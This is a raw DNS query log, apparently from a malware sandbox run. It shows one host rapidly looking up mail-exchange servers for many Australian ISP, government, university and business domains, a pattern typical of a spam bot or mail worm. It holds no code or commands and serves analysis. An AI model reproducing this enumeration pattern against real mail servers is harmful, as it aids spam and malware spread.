                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.144973993 CET192.168.2.38.8.8.80xc736Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.186817884 CET192.168.2.38.8.8.80x2f76Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.214118958 CET192.168.2.38.8.8.80xaa10Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.294274092 CET192.168.2.38.8.8.80xea77Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.315732002 CET192.168.2.38.8.8.80x65a6Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.382966042 CET192.168.2.38.8.8.80xb422Standard query (0)zincmedia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.454437971 CET192.168.2.38.8.8.80x9c26Standard query (0)mail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.529319048 CET192.168.2.38.8.8.80xcbe5Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.552011013 CET192.168.2.38.8.8.80x9e37Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.619448900 CET192.168.2.38.8.8.80xde0eStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.640007973 CET192.168.2.38.8.8.80x87b8Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.688154936 CET192.168.2.38.8.8.80x177eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.708636999 CET192.168.2.38.8.8.80xf4c2Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.722456932 CET192.168.2.38.8.8.80x4f34Standard query (0)zincmedia-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.784185886 CET192.168.2.38.8.8.80x5b6aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.804836988 CET192.168.2.38.8.8.80x1d73Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.877492905 CET192.168.2.38.8.8.80x3b87Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.895401001 CET192.168.2.38.8.8.80x9d8bStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.953084946 CET192.168.2.38.8.8.80x6d12Standard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.973942995 CET192.168.2.38.8.8.80xc337Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.064802885 CET192.168.2.38.8.8.80xfbd5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.085685968 CET192.168.2.38.8.8.80x62eStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.130521059 CET192.168.2.38.8.8.80x8acdStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.151535034 CET192.168.2.38.8.8.80x1058Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.223639011 CET192.168.2.38.8.8.80x657cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.245425940 CET192.168.2.38.8.8.80x640aStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.298237085 CET192.168.2.38.8.8.80x7058Standard query (0)free.fr.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.396007061 CET192.168.2.38.8.8.80xf6e6Standard query (0)dsto.defence.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.487778902 CET192.168.2.38.8.8.80x67d2Standard query (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.596272945 CET192.168.2.38.8.8.80x45e6Standard query (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.669070005 CET192.168.2.38.8.8.80x385aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.693806887 CET192.168.2.38.8.8.80x3b1Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.717516899 CET192.168.2.38.8.8.80x3833Standard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.736818075 CET192.168.2.38.8.8.80xa5b7Standard query (0)actmail.defence.gov.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.766804934 CET192.168.2.38.8.8.80x8699Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.798494101 CET192.168.2.38.8.8.80xd628Standard query (0)mx01.activ8.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.836389065 CET192.168.2.38.8.8.80x2ed2Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.863140106 CET192.168.2.38.8.8.80xb577Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.937026024 CET192.168.2.38.8.8.80xfcddStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.957532883 CET192.168.2.38.8.8.80x5f76Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.030344009 CET192.168.2.38.8.8.80x26adStandard query (0)act-mx.csiro.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.031697035 CET192.168.2.38.8.8.80x1408Standard query (0)aceradio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.085115910 CET192.168.2.38.8.8.80x78bdStandard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.108161926 CET192.168.2.38.8.8.80x7a1aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.132982969 CET192.168.2.38.8.8.80x53fStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.208739996 CET192.168.2.38.8.8.80x7cc5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.229824066 CET192.168.2.38.8.8.80x8ebbStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.282356024 CET192.168.2.38.8.8.80xd689Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.305069923 CET192.168.2.38.8.8.80xe0d4Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.375583887 CET192.168.2.38.8.8.80x554fStandard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.390414953 CET192.168.2.38.8.8.80xd49cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.412614107 CET192.168.2.38.8.8.80xacadStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.455926895 CET192.168.2.38.8.8.80x4e60Standard query (0)mail.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.476186991 CET192.168.2.38.8.8.80xca16Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.571446896 CET192.168.2.38.8.8.80x2a3cStandard query (0)phillipisland.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.663340092 CET192.168.2.38.8.8.80xd089Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.694900990 CET192.168.2.38.8.8.80x9961Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.721366882 CET192.168.2.38.8.8.80x5a4fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.816888094 CET192.168.2.38.8.8.80x1cffStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.865897894 CET192.168.2.38.8.8.80x3fbStandard query (0)designacademy.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.062388897 CET192.168.2.38.8.8.80x3823Standard query (0)phillipisland.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.063030005 CET192.168.2.38.8.8.80xbc61Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.074424028 CET192.168.2.38.8.8.80x75abStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.318873882 CET192.168.2.38.8.8.80x85c3Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.321310997 CET192.168.2.38.8.8.80xc9d7Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.427866936 CET192.168.2.38.8.8.80x922fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.446943045 CET192.168.2.38.8.8.80xf9fbStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.566426039 CET192.168.2.38.8.8.80xd7acStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.632639885 CET192.168.2.38.8.8.80x5336Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.677872896 CET192.168.2.38.8.8.80xba85Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.730482101 CET192.168.2.38.8.8.80x4ac5Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.775604963 CET192.168.2.38.8.8.80x43e2Standard query (0)dfc.sa.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.942162037 CET192.168.2.38.8.8.80xcae2Standard query (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.943852901 CET192.168.2.38.8.8.80x3fbStandard query (0)designacademy.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.951344013 CET192.168.2.38.8.8.80x4ed1Standard query (0)dfc-sa-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.961682081 CET192.168.2.38.8.8.80xbe90Standard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.967232943 CET192.168.2.38.8.8.80x69c8Standard query (0)scolelwd.melb.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.051994085 CET192.168.2.38.8.8.80xb9cdStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.076206923 CET192.168.2.38.8.8.80x6d56Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.160139084 CET192.168.2.38.8.8.80x2cd1Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.184323072 CET192.168.2.38.8.8.80x217cStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.992635012 CET192.168.2.38.8.8.80x963eStandard query (0)donnahay.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.005778074 CET192.168.2.38.8.8.80xd4abStandard query (0)ihug.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.084193945 CET192.168.2.38.8.8.80x670aStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.099514961 CET192.168.2.38.8.8.80x9d06Standard query (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.169621944 CET192.168.2.38.8.8.80xf6adStandard query (0)imcc-wa-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.192869902 CET192.168.2.38.8.8.80xcf50Standard query (0)picknowl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.295845985 CET192.168.2.38.8.8.80xf3a7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.422173977 CET192.168.2.38.8.8.80xe5d7Standard query (0)donnahay-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.423562050 CET192.168.2.38.8.8.80x26b8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.544178963 CET192.168.2.38.8.8.80xcf50Standard query (0)picknowl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.544289112 CET192.168.2.38.8.8.80xe5d7Standard query (0)donnahay-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.550004005 CET192.168.2.38.8.8.80x253cStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.561001062 CET192.168.2.38.8.8.80x5054Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.657418966 CET192.168.2.38.8.8.80xbbf7Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.663007975 CET192.168.2.38.8.8.80x1f22Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.681871891 CET192.168.2.38.8.8.80xf705Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.763310909 CET192.168.2.38.8.8.80x90e2Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.787254095 CET192.168.2.38.8.8.80x3788Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.834368944 CET192.168.2.38.8.8.80x901Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.853406906 CET192.168.2.38.8.8.80x9cc6Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.913289070 CET192.168.2.38.8.8.80x4996Standard query (0)deakin.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.939528942 CET192.168.2.38.8.8.80x98fdStandard query (0)deakin-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.002152920 CET192.168.2.38.8.8.80x2e2cStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.023716927 CET192.168.2.38.8.8.80xedcfStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.061381102 CET192.168.2.38.8.8.80xe19bStandard query (0)janellis.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.125829935 CET192.168.2.38.8.8.80xfacfStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.146140099 CET192.168.2.38.8.8.80x368dStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.174355030 CET192.168.2.38.8.8.80x917cStandard query (0)janellis-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.230993032 CET192.168.2.38.8.8.80xdc55Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.252336025 CET192.168.2.38.8.8.80x5c4cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.281498909 CET192.168.2.38.8.8.80x1704Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.305948973 CET192.168.2.38.8.8.80x6279Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.382320881 CET192.168.2.38.8.8.80x74acStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.401962996 CET192.168.2.38.8.8.80xff62Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.478018999 CET192.168.2.38.8.8.80x7c93Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.498822927 CET192.168.2.38.8.8.80x2e86Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.539083958 CET192.168.2.38.8.8.80xc1b2Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.559854031 CET192.168.2.38.8.8.80x4977Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.625818968 CET192.168.2.38.8.8.80xf4baStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.648797989 CET192.168.2.38.8.8.80xcc92Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.735462904 CET192.168.2.38.8.8.80x3f03Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.756444931 CET192.168.2.38.8.8.80xf7e5Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.825180054 CET192.168.2.38.8.8.80x2536Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.845884085 CET192.168.2.38.8.8.80xdc91Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.912539005 CET192.168.2.38.8.8.80x469Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.932077885 CET192.168.2.38.8.8.80x3c02Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.968262911 CET192.168.2.38.8.8.80x6ed5Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.993448973 CET192.168.2.38.8.8.80xcb84Standard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.077244043 CET192.168.2.38.8.8.80xaffeStandard query (0)webone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.179497957 CET192.168.2.38.8.8.80x788aStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.200478077 CET192.168.2.38.8.8.80xd97aStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.253278017 CET192.168.2.38.8.8.80x4960Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.275538921 CET192.168.2.38.8.8.80x267eStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.329988003 CET192.168.2.38.8.8.80xa8c2Standard query (0)rfi.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.427850962 CET192.168.2.38.8.8.80x1be9Standard query (0)cusdomain.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.440443039 CET192.168.2.38.8.8.80x8635Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.459506035 CET192.168.2.38.8.8.80x2b6dStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.470947027 CET192.168.2.38.8.8.80x95beStandard query (0)rfi-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.501261950 CET192.168.2.38.8.8.80x6073Standard query (0)corptech.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.599548101 CET192.168.2.38.8.8.80x1245Standard query (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.630467892 CET192.168.2.38.8.8.80x4d72Standard query (0)mail.austarnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.691984892 CET192.168.2.38.8.8.80xc028Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.713253975 CET192.168.2.38.8.8.80xa516Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.772335052 CET192.168.2.38.8.8.80x36b6Standard query (0)shoalhaven.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.798794031 CET192.168.2.38.8.8.80x477eStandard query (0)hallie.shoalhaven.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.854867935 CET192.168.2.38.8.8.80xdaa5Standard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.883382082 CET192.168.2.38.8.8.80x1dd7Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.906975985 CET192.168.2.38.8.8.80xca38Standard query (0)corptech-qld-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:54.970665932 CET192.168.2.38.8.8.80x9adStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.015646935 CET192.168.2.38.8.8.80xa0f0Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.039601088 CET192.168.2.38.8.8.80x62f0Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.073100090 CET192.168.2.38.8.8.80x473dStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.112929106 CET192.168.2.38.8.8.80xaaf4Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.133330107 CET192.168.2.38.8.8.80xd43bStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.186537981 CET192.168.2.38.8.8.80x7cb4Standard query (0)watercorporation.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.211457968 CET192.168.2.38.8.8.80x2e69Standard query (0)cust17545-2.in.mailcontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.329205036 CET192.168.2.38.8.8.80x656cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.350213051 CET192.168.2.38.8.8.80xf13Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.404547930 CET192.168.2.38.8.8.80x2ef8Standard query (0)amerro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.488826990 CET192.168.2.38.8.8.80x6aa7Standard query (0)leasewise.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.569021940 CET192.168.2.38.8.8.80xbdebStandard query (0)amerro-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.582890034 CET192.168.2.38.8.8.80xc984Standard query (0)mail.austria.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.752542973 CET192.168.2.38.8.8.80x72c2Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.765810013 CET192.168.2.38.8.8.80xbe63Standard query (0)leasewise-net-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
